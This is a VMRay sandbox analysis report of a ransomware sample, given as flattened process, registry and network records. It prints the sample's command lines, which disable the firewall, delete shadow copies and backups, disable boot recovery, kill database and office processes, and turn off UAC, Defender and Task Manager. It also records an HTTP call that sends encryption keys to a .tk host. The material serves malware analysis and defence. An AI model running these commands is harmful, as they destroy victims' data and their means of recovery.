VMRay Analyzer Report for Sample #410028
VMRay Analyzer
3.1.2
URI
mamo434376.tk
Resolved_To
Address
185.130.56.82
Process
1
3160
starter.exe
2144
starter.exe
"C:\Users\FD1HVy\Desktop\Starter.exe"
C:\Users\FD1HVy\Desktop\
c:\users\fd1hvy\desktop\starter.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Created
Process
4
3340
svchost.exe
3160
svchost.exe
"C:\Users\FD1HVy\AppData\Local\Temp\svchost.exe"
C:\Users\FD1HVy\Desktop\
c:\users\fd1hvy\appdata\local\temp\svchost.exe
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Created
Created
Created
Created
Created
Created
Modified_Properties_Of
Read_From
Process
5
4032
cmd.exe
3340
cmd.exe
"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Process
7
1176
cmd.exe
3340
cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Process
8
3980
cmd.exe
3340
cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Process
11
3736
cmd.exe
3340
cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Process
12
3160
cmd.exe
3340
cmd.exe
"C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Process
13
3400
cmd.exe
3340
cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Process
17
4100
vssadmin.exe
1176
vssadmin.exe
vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\vssadmin.exe
Process
18
4108
netsh.exe
4032
netsh.exe
netsh firewall set opmode disable
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\netsh.exe
Opened
Opened
Process
19
4116
vssadmin.exe
3400
vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\vssadmin.exe
Process
20
4128
net.exe
3160
net.exe
net stop DbxSvc
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
21
4144
taskkill.exe
3736
taskkill.exe
taskkill /f /im sql.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
Process
22
4152
vssadmin.exe
3980
vssadmin.exe
vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\vssadmin.exe
Process
23
4188
net1.exe
4128
net1.exe
C:\WINDOWS\system32\net1 stop DbxSvc
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
24
4252
net.exe
3160
net.exe
net stop OracleXETNSListener
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
25
4280
net1.exe
4252
net1.exe
C:\WINDOWS\system32\net1 stop OracleXETNSListener
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
26
4332
net.exe
3160
net.exe
net stop OracleServiceXE
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
27
4364
net1.exe
4332
net1.exe
C:\WINDOWS\system32\net1 stop OracleServiceXE
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
29
4408
net.exe
3160
net.exe
net stop AcrSch2Svc
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
30
4420
notepad.exe
3340
notepad.exe
"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\FD1HVy\Desktop\Lütfen Beni Oku!!!.log
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\notepad.exe
Process
31
4428
cmd.exe
3340
cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
33
4464
net1.exe
4408
net1.exe
C:\WINDOWS\system32\net1 stop AcrSch2Svc
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
34
4484
wmic.exe
3400
wmic.exe
wmic shadowcopy delete
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\wbem\wmic.exe
Opened
Process
35
4520
net.exe
3160
net.exe
net stop AcronisAgent
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
36
4532
net1.exe
4520
net1.exe
C:\WINDOWS\system32\net1 stop AcronisAgent
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
37
4544
vssadmin.exe
4428
vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\vssadmin.exe
Process
38
4556
taskkill.exe
3736
taskkill.exe
taskkill /f /im winword.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
Process
39
4568
net.exe
3160
net.exe
net stop Apache2.4
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
40
4580
net1.exe
4568
net1.exe
C:\WINDOWS\system32\net1 stop Apache2.4
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
41
4612
net.exe
3160
net.exe
net stop SQLWriter
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
42
4624
net1.exe
4612
net1.exe
C:\WINDOWS\system32\net1 stop SQLWriter
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
44
4696
net.exe
3160
net.exe
net stop MSSQL$SQLEXPRESS
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
46
4716
net1.exe
4696
net1.exe
C:\WINDOWS\system32\net1 stop MSSQL$SQLEXPRESS
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
48
4744
wmic.exe
4428
wmic.exe
wmic shadowcopy delete
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\wbem\wmic.exe
Opened
Process
49
4756
taskkill.exe
3736
taskkill.exe
taskkill /f /im wordpad.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
Process
50
4764
net.exe
3160
net.exe
net stop MSSQLServerADHelper100
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
51
4780
net1.exe
4764
net1.exe
C:\WINDOWS\system32\net1 stop MSSQLServerADHelper100
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
52
4808
net.exe
3160
net.exe
net stop MongoDB
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
53
4828
net1.exe
4808
net1.exe
C:\WINDOWS\system32\net1 stop MongoDB
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
54
4920
net.exe
3160
net.exe
net stop SQLAgent$SQLEXPRESS
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
55
4936
net1.exe
4920
net1.exe
C:\WINDOWS\system32\net1 stop SQLAgent$SQLEXPRESS
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
56
4972
net.exe
3160
net.exe
net stop SQLBrowser
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
57
4984
net1.exe
4972
net1.exe
C:\WINDOWS\system32\net1 stop SQLBrowser
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
58
5000
taskkill.exe
3736
taskkill.exe
taskkill /f /im outlook.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
Process
59
5028
net.exe
3160
net.exe
net stop CobianBackup11
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
60
5052
net1.exe
5028
net1.exe
C:\WINDOWS\system32\net1 stop CobianBackup11
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
61
5068
taskkill.exe
3736
taskkill.exe
taskkill /f /im thunderbird.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
Process
62
5084
net.exe
3160
net.exe
net stop cbVSCService11
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
63
5108
net1.exe
5084
net1.exe
C:\WINDOWS\system32\net1 stop cbVSCService11
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
64
2828
taskkill.exe
3736
taskkill.exe
taskkill /f /im oracle.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
Process
65
2320
net.exe
3160
net.exe
net stop QBCFMontorService
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
66
4188
net1.exe
2320
net1.exe
C:\WINDOWS\system32\net1 stop QBCFMontorService
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
67
3940
taskkill.exe
3736
taskkill.exe
taskkill /f /im excel.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
Process
69
4336
net.exe
3160
net.exe
net stop QBVSS
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net.exe
Child_Of
Process
70
1032
taskkill.exe
3736
taskkill.exe
taskkill /f /im onenote.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
Process
71
3352
net1.exe
4336
net1.exe
C:\WINDOWS\system32\net1 stop QBVSS
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\net1.exe
Opened
Opened
Process
72
4452
taskkill.exe
3736
taskkill.exe
taskkill /f /im virtualboxvm.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
Process
73
3496
taskkill.exe
3736
taskkill.exe
taskkill /f /im node.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
Process
74
4376
taskkill.exe
3736
taskkill.exe
taskkill /f /im QBW32.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
Process
75
4580
taskkill.exe
3736
taskkill.exe
taskkill /f /im WBGX.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
Process
76
4616
taskkill.exe
3736
taskkill.exe
taskkill /f /im Teams.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
Process
77
3340
taskkill.exe
3736
taskkill.exe
taskkill /f /im Flow.*
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\taskkill.exe
File
STD_OUTPUT_HANDLE
WinRegistryKey
Software\Embarcadero\Locales
HKEY_CURRENT_USER
WinRegistryKey
Software\Embarcadero\Locales
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\CodeGear\Locales
HKEY_CURRENT_USER
WinRegistryKey
Software\CodeGear\Locales
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Borland\Locales
HKEY_CURRENT_USER
WinRegistryKey
Software\Borland\Delphi\Locales
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE
ConsentPromptBehaviorAdmin
5
REG_DWORD_LITTLE_ENDIAN
ConsentPromptBehaviorUser
3
REG_DWORD_LITTLE_ENDIAN
dontdisplaylastusername
0
REG_DWORD_LITTLE_ENDIAN
EnableInstallerDetection
1
REG_DWORD_LITTLE_ENDIAN
EnableLUA
0
REG_DWORD_LITTLE_ENDIAN
EnableSecureUIAPaths
1
REG_DWORD_LITTLE_ENDIAN
EnableUIADesktopToggle
5
REG_DWORD_LITTLE_ENDIAN
EnableVirtualization
1
REG_DWORD_LITTLE_ENDIAN
FilterAdministratorToken
0
REG_DWORD_LITTLE_ENDIAN
legalnoticecaption
REG_SZ
legalnoticetext
REG_SZ
PromptOnSecureDesktop
1
REG_DWORD_LITTLE_ENDIAN
scforceoption
0
REG_DWORD_LITTLE_ENDIAN
shutdownwithoutlogon
1
REG_DWORD_LITTLE_ENDIAN
undockwithoutlogon
1
REG_DWORD_LITTLE_ENDIAN
ValidateAdminCodeSignatures
0
REG_DWORD_LITTLE_ENDIAN
Mutex
OneCopyMutex
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
HKEY_LOCAL_MACHINE
MS Shell Dlg 2
MS Shell Dlg 2
WinRegistryKey
Control Panel\desktop
HKEY_CURRENT_USER
Wallpaper
C:\Users\FD1HVy\@Adsız@.jpg
REG_SZ
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE
ConsentPromptBehaviorAdmin
5
REG_DWORD_LITTLE_ENDIAN
ConsentPromptBehaviorUser
3
REG_DWORD_LITTLE_ENDIAN
dontdisplaylastusername
0
REG_DWORD_LITTLE_ENDIAN
EnableInstallerDetection
1
REG_DWORD_LITTLE_ENDIAN
EnableLUA
0
REG_DWORD_LITTLE_ENDIAN
EnableSecureUIAPaths
1
REG_DWORD_LITTLE_ENDIAN
EnableUIADesktopToggle
5
REG_DWORD_LITTLE_ENDIAN
EnableVirtualization
1
REG_DWORD_LITTLE_ENDIAN
FilterAdministratorToken
0
REG_DWORD_LITTLE_ENDIAN
legalnoticecaption
REG_SZ
legalnoticetext
REG_SZ
PromptOnSecureDesktop
1
REG_DWORD_LITTLE_ENDIAN
scforceoption
0
REG_DWORD_LITTLE_ENDIAN
shutdownwithoutlogon
1
REG_DWORD_LITTLE_ENDIAN
undockwithoutlogon
1
REG_DWORD_LITTLE_ENDIAN
ValidateAdminCodeSignatures
0
REG_DWORD_LITTLE_ENDIAN
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows Defender
HKEY_LOCAL_MACHINE
DisableAntiSpyware
1
REG_DWORD_LITTLE_ENDIAN
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER
DisableTaskMgr
1
REG_DWORD_LITTLE_ENDIAN
WinRegistryKey
Control Panel
HKEY_CURRENT_USER
WinRegistryKey
Control Panel\desktop
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER
DisableTaskMgr
0
REG_DWORD_LITTLE_ENDIAN
WinRegistryKey
Control Panel\desktop
HKEY_CURRENT_USER
TileWallpaper
0
REG_SZ
DNSRecord
mamo434376.tk
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Policies\Microsoft\Windows\System
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_CURRENT_USER
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\NetSh
HKEY_LOCAL_MACHINE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
File
STD_ERROR_HANDLE
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE
Logging
Logging Directory
Logging Directory
Log File Max Size
Logging
Logging Directory
Logging Directory
Log File Max Size
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
Analyzed Sample #410028
Malware Artifacts
410028
Sample-ID: #410028
Job-ID: #1012874
This sample was analyzed by VMRay Analyzer 3.1.2 on a Windows 10 Redstone 2 system
100
VTI Score based on VTI Database Version 3.5
Metadata of Sample File #410028
Submission-ID: #2606182
16b829c1601755a0843c35da54209e923ded6d9ced16506e0831d568717bd8aeexe
MD5
c7bbff934bd89ad39e98e2746c6e8af2
SHA1
01623c01bd7587e98c35f7f8119703c85dbb6a24
SHA256
16b829c1601755a0843c35da54209e923ded6d9ced16506e0831d568717bd8ae
Opened_By
Metadata of Analysis for Job-ID #1012874
False
Timeout
True
240.105
NQDPDE
win10_64_rs2
x86 64-bit
Windows 10 Redstone 2
10.0.15063.540 (f6f48955-5489-4b24-b4df-942361f0730d)
FD1HVy
NQDPDE
This is a property collection for additional information of VMRay analysis
VMRay Analyzer
Anti Analysis
VTI rule match with VTI rule score 2/5
vmray_dynamic_api_usage_by_api
Resolves an unusually high number of APIs.
Resolves APIs dynamically to possibly evade static detection
OS
VTI rule match with VTI rule score 5/5
vmray_disable_uac_dialog_by_registry
Disables UAC dialog by registry.
Bypasses Windows User Account Control (UAC)
Process
VTI rule match with VTI rule score 1/5
vmray_create_process_with_hidden_window
The process "C:\Users\FD1HVy\AppData\Local\Temp\svchost.exe" starts with hidden window.
Creates process with hidden window
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "OneCopyMutex".
Creates system object
Process
VTI rule match with VTI rule score 1/5
vmray_create_process_with_hidden_window
The process "cmd.exe" starts with hidden window.
Creates process with hidden window
File System
VTI rule match with VTI rule score 1/5
vmray_create_file_in_os_dir
Creates file "C:\Windows\System32\drivers\etc\host" in the OS directory.
Modifies operating system directory
OS
VTI rule match with VTI rule score 4/5
vmray_disable_taskmgr_by_registry
Disables the Task Manager.
Disables a crucial system tool
Network Connection
VTI rule match with VTI rule score 1/5
vmray_request_dns_by_name
Resolves host name "mamo434376.tk".
Performs DNS request
OS
VTI rule match with VTI rule score 3/5
vmray_disable_startup_repair
Disables startup repair by executing ""C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup".
Disables a Windows system tool
File System
VTI rule match with VTI rule score 4/5
vmray_modify_user_files
Modifies the content of multiple user files. This is an indicator for an encryption attempt.
Modifies content of user files
File System
VTI rule match with VTI rule score 4/5
vmray_rename_user_files
Renames multiple user files. This is an indicator for an encryption attempt.
Renames user files
OS
VTI rule match with VTI rule score 2/5
vmray_set_desktop_wallpaper_by_api
Sets the desktop wallpaper to the file "".
Changes the desktop wallpaper.
File System
VTI rule match with VTI rule score 1/5
vmray_create_file_in_os_dir
Creates file "C:\WINDOWS\Lütfen Beni Oku!!!.log" in the OS directory.
Modifies operating system directory
OS
VTI rule match with VTI rule score 4/5
vmray_modify_windows_backup_settings
Deletes Windows volume shadow copies.
Modifies Windows automatic backups
File System
VTI rule match with VTI rule score 1/5
vmray_create_many_files
Creates an unusually large number of files.
Creates an unusually large number of files
Process
VTI rule match with VTI rule score 2/5
vmray_create_many_processes
Above average number of processes were monitored.
Creates an unusually large number of processes
Local AV
VTI rule match with VTI rule score 5/5
vmray_av_malicious_match
Local AV detected the dropped file "C:\Users\FD1HVy\AppData\Local\Temp\svchost.exe" as "GenPack:Generic.Malware.FHTk.1562EF97".
Malicious content was detected by heuristic scan
Local AV
VTI rule match with VTI rule score 5/5
vmray_av_malicious_match
Local AV detected a memory dump of process "starter.exe" as "GenPack:Generic.Malware.FHTk.1562EF97".
Malicious content was detected by heuristic scan
Local AV
VTI rule match with VTI rule score 5/5
vmray_av_malicious_match
Local AV detected a memory dump of process "svchost.exe" as "Gen:Trojan.Heur.np1@rOPUVCni".
Malicious content was detected by heuristic scan
Local AV
VTI rule match with VTI rule score 5/5
vmray_av_malicious_match
Local AV detected a memory dump of process "svchost.exe" as "GenPack:Generic.Malware.FHTk.813023F0".
Malicious content was detected by heuristic scan
Network Connection
VTI rule match with VTI rule score 1/5
vmray_tcp_in_connection
Incoming TCP connection from host "185.130.56.82:80".
Connects to remote host
Network Connection
VTI rule match with VTI rule score 1/5
vmray_tcp_out_connection
Outgoing TCP connection to host "185.130.56.82:80".
Connects to remote host
Network Connection
VTI rule match with VTI rule score 1/5
vmray_establish_http_connection
URL "http://mamo434376.tk/tarih.php".
Connects to HTTP server
Network Connection
VTI rule match with VTI rule score 1/5
vmray_establish_http_connection
URL "http://mamo434376.tk/edata.php?info=ID:__HkTkJDzxbp___Key1:___HIUCWKYieiXAkspdTrBBiVlJiovlAnlSYJjGGGaXLGUyUSVAiYSkBljAwdYkJXgUJydhSfXgOMTnyjFUygbRflkHRFGDGwuBULTiZzDbSNmUdoSUpENpdmNfcbTUXsZVXPiR____Key2:___wBejBrIyRVVgRoucMLBTlzRmUFzNwqxErfuqiIUamcGslwVoLhtDcqFiFdEvVRNwHyWgKUaEjSUpirqIBdaDKisuXVcPYIcKVrnuIqeApwKYjAEURxMzJhMvrtvDRRHZqzbc____Tarih:___07/01/2020".
Connects to HTTP server
Network Connection
VTI rule match with VTI rule score 2/5
vmray_install_tcp_server
TCP server listens on port "49679".
Sets up server that accepts incoming connections
PE
VTI rule match with VTI rule score 1/5
vmray_drop_pe_file
Drops file "C:\Users\FD1HVy\AppData\Local\Temp\svchost.exe".
Drops PE file
PE
VTI rule match with VTI rule score 1/5
vmray_execute_dropped_pe_file
Executes dropped file "C:\Users\FD1HVy\AppData\Local\Temp\svchost.exe".
Executes dropped PE file
Static
VTI rule match with VTI rule score 1/5
vmray_static_analysis_parser_error
Static engine was unable to completely parse the analyzed file: C:\Users\FD1HVy\Desktop\Starter.exe.
Unparsable sections in file